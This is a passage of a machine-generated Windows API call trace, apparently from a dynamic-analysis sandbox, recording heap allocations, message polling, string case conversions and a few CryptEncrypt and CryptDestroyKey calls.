(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.633] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.634] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0264.634] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.634] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.634] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.634] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.634] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0264.634] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.634] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.634] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.635] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.635] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.635] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.635] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.635] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.635] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0264.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.635] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0264.636] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.636] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.636] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.636] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.636] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.636] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.636] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.636] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.636] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.636] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.636] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.636] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.636] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.636] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.636] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.636] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.637] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.637] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.637] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.637] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.637] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.637] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.638] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.638] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.638] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0264.638] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.639] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0264.639] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.639] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.640] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.640] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.640] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.642] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.642] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.643] CryptDestroyKey (hKey=0xaa58a0) returned 1 [0264.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0264.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.643] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.643] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.643] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0264.643] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.644] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.644] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.644] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.644] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.644] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.644] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.644] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.644] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.645] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.645] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0264.645] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.645] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.646] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.646] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.646] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.646] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.646] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.646] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.647] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.647] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0264.647] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: 